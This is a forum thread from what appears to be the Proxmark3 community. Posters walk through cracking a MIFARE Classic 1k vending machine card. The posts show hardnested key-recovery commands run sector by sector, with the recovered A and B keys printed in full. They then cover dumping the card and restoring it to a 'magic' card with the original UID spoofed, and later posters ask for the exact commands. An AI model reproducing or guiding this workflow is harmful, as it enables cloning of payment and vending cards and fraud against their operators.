Research, development and trades concerning the powerful Proxmark3 device.
Remember; sharing is caring. Bring something back to the community.
"Learn the tools of the trade the hard way." +Fravia
Time changes and with it the technology
Proxmark3 @ discord
Users of this forum, please be aware that information stored on this site is not private.
Hello people! Me and my friend have some questions on how to hack a vending machine Mifare CLASSIC 1k.
The mifare in question is a hardnested type.
With weak pseudorandom number generator we didn't have any kind of problems.
But with hardnested we are asking ourselfs if we are doing a good job.
So first of all we search for the high frequency mifare and get the following:
proxmark3> hf se
UID : 7b 0d 92 22
ATQA : 00 04
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443-4 card found, RATS not supported
No chinese magic backdoor command detected
Prng detection: HARDENED (hardnested)
Valid ISO14443A Tag Found - Quiting Search
Then we try to check it with the default keys as usual ... but it seems prety locked
proxmark3> hf mf chk * ?
No key specified, trying default keys
chk default key[ 0] ffffffffffff
chk default key[ 1] 000000000000
chk default key[ 2] a0a1a2a3a4a5
chk default key[ 3] b0b1b2b3b4b5
chk default key[ 4] aabbccddeeff
chk default key[ 5] 1a2b3c4d5e6f
chk default key[ 6] 123456789abc
chk default key[ 7] 010203040506
chk default key[ 8] 123456abcdef
chk default key[ 9] abcdef123456
chk default key[10] 4d3a99c351dd
chk default key[11] 1a982c7e459a
chk default key[12] d3f7d3f7d3f7
chk default key[13] 714c5c886e97
chk default key[14] 587ee5f9350f
chk default key[15] a0478cc39091
chk default key[16] 533cb6c723f6
chk default key[17] 8fd0a4f256e9
To cancel this operation press the button on the proxmark...
--o
|---|----------------|---|----------------|---|
|sec|key A |res|key B |res|
|---|----------------|---|----------------|---|
|000| a0a1a2a3a4a5 | 1 | ffffffffffff | 0 |
|001| ffffffffffff | 0 | ffffffffffff | 0 |
|002| ffffffffffff | 0 | ffffffffffff | 0 |
|003| ffffffffffff | 0 | ffffffffffff | 0 |
|004| ffffffffffff | 0 | ffffffffffff | 0 |
|005| ffffffffffff | 0 | ffffffffffff | 0 |
|006| ffffffffffff | 0 | ffffffffffff | 0 |
|007| ffffffffffff | 0 | ffffffffffff | 0 |
|008| ffffffffffff | 0 | ffffffffffff | 0 |
|009| ffffffffffff | 0 | ffffffffffff | 0 |
|010| ffffffffffff | 0 | ffffffffffff | 0 |
|011| ffffffffffff | 0 | ffffffffffff | 0 |
|012| ffffffffffff | 0 | ffffffffffff | 0 |
|013| ffffffffffff | 0 | ffffffffffff | 0 |
|014| ffffffffffff | 0 | ffffffffffff | 0 |
|015| ffffffffffff | 0 | ffffffffffff | 0 |
|---|----------------|---|----------------|---|
so the first thing i think is ... well lets try with hardnested atack with a0a1a2a3a4a5 ! And it gives me the key eae8968d5c70 !
proxmark3> hf mf hard * A a0a1a2a3a4a5 10 A
--target block no: 10, target key type:A, known target key: 0x000000000000 (not
set), file action: none, Slow: No, Tests: 0
Using AVX2 SIMD core.
time | #nonces | Activity | expected to brute force
| | | #states | time
--------------------------------------------------------------------------------
----------------------
0 | 0 | Start using 4 threads and AVX2 SIMD core |
|
0 | 0 | Brute force benchmark: 341 million (2^28.3) keys/s | 1
40737488355328 | 5d
1 | 0 | Using 235 precalculated bitflip state tables | 1
40737488355328 | 5d
...
20 | 1440 | Apply bit flip properties |
15487296512 | 45s
20 | 1440 | (Ignoring Sum(a8) properties) |
15487296512 | 45s
29 | 1440 | Starting brute force... |
15487296512 | 45s
95 | 1440 | Brute force phase completed. Key found: eae8968d5c70 |
0 | 0s
proxmark3> hf mf hard * A ffffffffffff 20 A
--target block no: 20, target key type:A, known target key: 0x000000000000 (not
set), file action: none, Slow: No, Tests: 0
Using AVX2 SIMD core.
time | #nonces | Activity | e
xpected to brute force
| | | #
states | time
--------------------------------------------------------------------------------
----------------------
0 | 0 | Start using 4 threads and AVX2 SIMD core |
|
0 | 0 | Brute force benchmark: 350 million (2^28.4) keys/s | 1
40737488355328 | 5d
1 | 0 | Using 235 precalculated bitflip state tables | 1
40737488355328 | 5d
#db# Authentication failed. Card timeout.
... and here is the question what comands should i launch now?
Am i doing this right?
What do i need to do now , if i need to emulate it after?
Thank you for your collaboration.
Forgot to mention , i then added the key that has been found to default_keys.dic and executed :
hf mf chk * ? ./default_keys.dic that gave me this result:
|---|----------------|---|----------------|---|
|sec|key A |res|key B |res|
|---|----------------|---|----------------|---|
|000| a0a1a2a3a4a5 | 1 | ffffffffffff | 0 |
|001| ffffffffffff | 0 | ffffffffffff | 0 |
|002| eae8968d5c70 | 1 | ffffffffffff | 0 |
|003| ffffffffffff | 0 | ffffffffffff | 0 |
|004| ffffffffffff | 0 | ffffffffffff | 0 |
|005| ffffffffffff | 0 | ffffffffffff | 0 |
|006| ffffffffffff | 0 | ffffffffffff | 0 |
|007| ffffffffffff | 0 | ffffffffffff | 0 |
|008| ffffffffffff | 0 | ffffffffffff | 0 |
|009| ffffffffffff | 0 | ffffffffffff | 0 |
|010| ffffffffffff | 0 | ffffffffffff | 0 |
|011| ffffffffffff | 0 | ffffffffffff | 0 |
|012| ffffffffffff | 0 | ffffffffffff | 0 |
|013| ffffffffffff | 0 | ffffffffffff | 0 |
|014| ffffffffffff | 0 | ffffffffffff | 0 |
|015| ffffffffffff | 0 | ffffffffffff | 0 |
|---|----------------|---|----------------|---|
so i am continuing to launch these commands everytime increasing by 4 the block number :
hf mf hard * A a0a1a2a3a4a5 0 A
.............
hf mf hard * A a0a1a2a3a4a5 4 A
and everytime i am adding the descoverd key to default_keys.dic and by launching hf mf chk * ? ./default_keys.dic the output is :
|---|----------------|---|----------------|---|
|sec|key A |res|key B |res|
|---|----------------|---|----------------|---|
|000| a0a1a2a3a4a5 | 1 | ffffffffffff | 0 |
|001| e96df21719be | 1 | ffffffffffff | 0 |
|002| eae8968d5c70 | 1 | fa96f7ca8711 | 1 |
|003| ebba460cc639 | 1 | ffffffffffff | 0 |
|004| ec35e167359b | 1 | ffffffffffff | 0 |
|005| edaf6fdb9ed9 | 1 | ffffffffffff | 0 |
|006| eed4781b585a | 1 | ffffffffffff | 0 |
|007| ef79fbce8bce | 1 | ffffffffffff | 0 |
|008| e06a8a878a21 | 1 | ffffffffffff | 0 |
|009| ffffffffffff | 0 | ffffffffffff | 0 |
|010| e2c737ed3316 | 1 | ffffffffffff | 0 |
|011| e3f90ff4ba70 | 1 | ffffffffffff | 0 |
|012| e48172f43898 | 1 | ffffffffffff | 0 |
|013| ffffffffffff | 0 | ffffffffffff | 0 |
|014| ffffffffffff | 0 | ffffffffffff | 0 |
|015| ffffffffffff | 0 | ffffffffffff | 0 |
|---|----------------|---|----------------|---|
Needless to say i am continuing even if i don't know if i am doing something right
If someone could tell me if i am doing something wrong i would be happy to follow.
Last edited by apotere (2018-10-31 21:17:33)
Now that i got all the keys for all the blocks :
hf mf chk * ? ./default_keys.dic
|---|----------------|---|----------------|---|
|sec|key A |res|key B |res|
|---|----------------|---|----------------|---|
|000| a0a1a2a3a4a5 | 1 | f8a4e8d9f4a1 | 1 |
|001| e96df21719be | 1 | f9166635409a | 1 |
|002| eae8968d5c70 | 1 | fa96f7ca8711 | 1 |
|003| ebba460cc639 | 1 | fbe05a0fc474 | 1 |
|004| ec35e167359b | 1 | fca7e1b85fcf | 1 |
|005| edaf6fdb9ed9 | 1 | fd1f82ab8613 | 1 |
|006| eed4781b585a | 1 | fecf0f1f927e | 1 |
|007| ef79fbce8bce | 1 | ffd0e0d3d4dc | 1 |
|008| e06a8a878a21 | 1 | f0f17ba7db5c | 1 |
|009| e18f1bfeffbb | 1 | f117de730420 | 1 |
|010| e2c737ed3316 | 1 | f2925a13b3d8 | 1 |
|011| e3f90ff4ba70 | 1 | f3c8f8c4ff92 | 1 |
|012| e48172f43898 | 1 | f4f99dcb9d8a | 1 |
|013| e58279d9ff09 | 1 | f5068427a2c4 | 1 |
|014| e66023533727 | 1 | f6c9f83b0b24 | 1 |
|015| e752a5b81cf5 | 1 | f76796010efd | 1 |
|---|----------------|---|----------------|---|
How can i dump them in a bin file?
pretty good website :
https://scund00r.com/all/rfid/2018/06/0 … sheet.html has all what i needed to emulate the vendor key.
Have a good day !
so now i am tring to restore the dump in another card that has arived with the proxmark :
hf mf restore
Restoring dumpdata.bin to card
Writing to block 0: 7b 0d 92 22 c6 88 04 00 c8 18 00 20 00 00 00 14
#db# Cmd Error: 04
#db# Write block error
#db# WRITE BLOCK FINISHED
isOk:00
Writing to block 1: 7b 00 26 88 26 88 00 00 00 00 00 00 00 00 00 00
#db# WRITE BLOCK FINISHED
isOk:01
Writing to block 2: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
#db# WRITE BLOCK FINISHED
isOk:01
But on the first block [0] i get this error : #db# Cmd Error: 04
Can someone advise?
Hello there!
We managed to restore the data on a chinese magic mifare and we managed to set the "fake" uid.
Now if we try to restore the data or to write to a block it gives this error:
#db# Authentication failed. Card timeout.
#db# Auth error
#db# WRITE BLOCK FINISHED
Can someone tell me how to wipe it to 0 so i can restore it one more time , or how can i find the key to write to the card a specific block?
Thank you
Hello you can tell me that you have to use commands with Prof Mark to be able to read the keys in a me make classic
Honestly I can not understand what commands you have to enter so that give me all the keys and all blocks do not know how to do you can help me please